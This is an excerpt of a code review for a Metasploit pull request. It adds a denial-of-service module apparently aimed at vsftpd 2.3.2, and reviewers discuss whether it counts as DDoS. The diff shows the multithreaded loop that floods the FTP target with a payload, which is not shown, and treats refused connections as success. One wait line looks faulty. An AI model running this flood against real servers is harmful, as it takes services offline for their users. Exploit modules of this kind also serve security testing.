modules/auxiliary/dos/ftp/vstfpd_232.rb

```diff
@@ -0,0 +1,126 @@
+
+    vprint_status("Payload being sent: #{payload}")
+
+    threads = []
+    datastore['TestThreads'].times do
+      threads << Thread.new do
+        # Connect to ftp port
+        ftp = connect_ftp(datastore['RHOSTS'], datastore['RPORT'], datastore['FTPUSER'], datastore['FTPPASS'])
+
+        loop do
+          print_status('sending payload')
+          10.times do
+            ftp.send_cmd([payload.to_s], false)
+          end
+          ftp.send_cmd([payload.to_s], true)
+        rescue Rex::ConnectionTimeout
+          print_error('Connection timeout! Sending again')
+        rescue Errno::ECONNRESET
+          print_error('Connection reset!')
+        rescue Rex::ConnectionRefused
+          print_good('Connection refused! Appears DOS attack succeeded.')
+        end
+        ftp.disconnect
+      end
+    end
+    sleep(1) until 10.times
+
+    # Stop the threads
+    threads.each(&:kill)
+    threads.each(&:join)
+    print_status('DDOS ended.')
```

Comment:
This isn't a Distributed DoS attack.

Reply:
Distributed DoS would imply that you have multiple machines targeting a server at the same. However since Metasploit doesn't really support distributed setups (vs being installed on one machine from which the attacks are run), its not really possible to call anything within Metasploit a DDoS module, at least not with the current code we have.

Reply:
Alright, well the ddos references are gone now, and I can confirm that the payload works as intended